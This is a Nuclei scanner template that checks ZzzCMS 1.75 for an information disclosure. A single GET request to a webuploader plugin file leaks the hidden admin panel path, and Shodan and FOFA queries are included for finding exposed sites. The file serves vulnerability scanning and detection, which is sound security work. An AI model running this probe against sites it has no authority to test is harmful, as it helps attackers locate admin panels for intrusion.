nuclei-templates/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml

45 lines
1.3 KiB
YAML

id: zzzcms-info-disclosure
info:
name: Zzzcms 1.75 - Information Disclosure
author: ritikchaddha
severity: low
description: |
There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore
reference:
- https://xz.aliyun.com/t/7414
classification:
cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: zzzcms
product: zzzcms
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
tags: zzzcms,info,disclosure
http:
- raw:
- |
GET /plugins/webuploader/js/webconfig.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var adminpath'
- 'var imageMaxSize='
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a00463044022038729ea24fa4713cc74431b35c60b8ee357a78f966bffd28abaf040dfff6ff4402200094cf74570c5e79e4727c75845c00143db6f1c029681dfad68170ed6807a945:922c64590222798bb761d5b6d8e72950